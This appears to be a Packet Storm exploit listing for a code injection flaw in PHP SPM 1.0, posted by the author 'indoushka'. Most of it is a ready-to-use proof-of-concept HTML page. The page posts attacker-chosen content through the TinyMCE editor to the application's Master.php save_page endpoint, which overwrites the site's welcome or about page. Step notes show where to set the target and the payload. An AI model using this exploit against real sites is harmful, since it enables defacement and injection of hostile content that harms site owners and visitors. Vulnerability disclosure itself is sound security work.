Headline

PHP SPM 1.0 WYSIWYG Code Injection

PHP SPM version 1.0 suffers from a WYSIWYG code injection vulnerability.

1 month ago

#vulnerability #windows #js #php #auth #firefox

=============================================================================================================================================
| # Title : php spm 1.0 WYSIWYG code injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip |
=============================================================================================================================================

poc :

[+] This payload injects code of your choice into the welcome page or about via TinyMCE is a WYSIWYG editor V: 7.3.0 which is called inside the file /php-spms/classes/Master.php .

[+] Line 86 : Set your Target.

[+] Line 27 : set your payload. <textarea name="page[welcome] ===> You can type welcome or about.

[+] save payload as poc.html

[+] payload :

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Welcome Page Editor</title>
<script src="https://cdn.tiny.cloud/1/dsrqgwhljvccmtuu414smiyefdarsp88j5fxk0uks60iek04/tinymce/7/tinymce.min.js" referrerpolicy="origin"></script>
</head>
<body>
<main id="main" class="main">
<div class="pagetitle">
<h1>Welcome Page</h1>
<nav>
<ol class="breadcrumb">

                         <li class="breadcrumb-item active">Welcome Page</li>  
          </ol>  
      </nav>  
    </div>

    <div id="msg-container"></div>

            <div class="card rounded-0">  
      <div class="card-body rounded-0 pt-4">  
        <div class="container-fluid">  
          <form id="page-form">  
            <textarea name="page[welcome]" cols="30" rows="10" class="form-control tinymce-editor" required>Hacked By indoushka ;</textarea>  
          </form>  
        </div>  
      </div>  
      <div class="card-footer">  
        <div class="col-lg-4 col-md-5 col-sm-10 col-12 mx-auto">  
          <button class="btn btn-block w-100 btn-primary" form="page-form">Update</button>  
        </div>  
      </div>  
    </div>

    <div id="loader" style="display:none;">Loading...</div>  
    <div id="toast"></div>

    <script>  
        // Initialize TinyMCE  
        tinymce.init({  
            selector: 'textarea.tinymce-editor',  
            height: 300,  
            menubar: false,  
            plugins: [  
              'advlist autolink lists link image charmap print preview anchor',  
              'searchreplace visualblocks code fullscreen',  
              'insertdatetime media table paste code help wordcount'  
            ],  
            toolbar: 'undo redo | formatselect | bold italic backcolor | ' +  
                     'alignleft aligncenter alignright alignjustify | ' +  
                     'bullist numlist outdent indent | removeformat | help'  
        });

        // Loader functions  
        function start_loader() {  
            document.getElementById('loader').style.display = 'block';  
        }

        function end_loader() {  
            document.getElementById('loader').style.display = 'none';  
        }

        // Toast function  
        function showMessage(message, type) {  
            const messageDiv = document.getElementById('toast');  
            messageDiv.innerHTML = `<div class="alert alert-${type}">${message}</div>`;  
            setTimeout(() =>        {  
                messageDiv.innerHTML = '';  
            }, 3000);  
        }

        // Form submit event listener  
        document.getElementById('page-form').addEventListener('submit', function(e) {  
            e.preventDefault(); // Prevent page reload

            // Start loader  
            start_loader();

            const formData = new FormData(this); // Get form data  
            const xhr = new XMLHttpRequest(); // Create new XMLHttpRequest object

            // Set up request  
            xhr.open('POST', 'http://localhost/php-spms/classes/Master.php?f=save_page', true);

            // Handle response  
            xhr.onreadystatechange = function() {  
                if (xhr.readyState === XMLHttpRequest.DONE) {  
                    end_loader();  
                    if (xhr.status === 200) {  
                        const response = JSON.parse(xhr.responseText);  
                        if (response.status === 'success') {  
                            showMessage('Page updated successfully!', 'success');  
                            location.reload(); // Reload the page if successful  
                        } else if (response.status === 'failed' && response.msg) {  
                            showMessage(response.msg, 'error');  
                        } else {  
                            showMessage('An unknown error occurred.', 'error');  
                        }  
                    } else {  
                        showMessage('Error: ' + xhr.statusText, 'error');  
                    }  
                }  
            };

            // Send the request  
            xhr.send(formData);  
        });  
    </script>  
</main>

</body>
</html>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution

2 days ago

Packet Storm

ProjectSend R1605 Unauthenticated Remote Code Execution

2 days ago

Packet Storm

needrestart Local Privilege Escalation

2 days ago

Packet Storm

fronsetia 1.1 Cross Site Scripting

2 days ago

Packet Storm

fronsetia 1.1 XML Injection

2 days ago

Packet Storm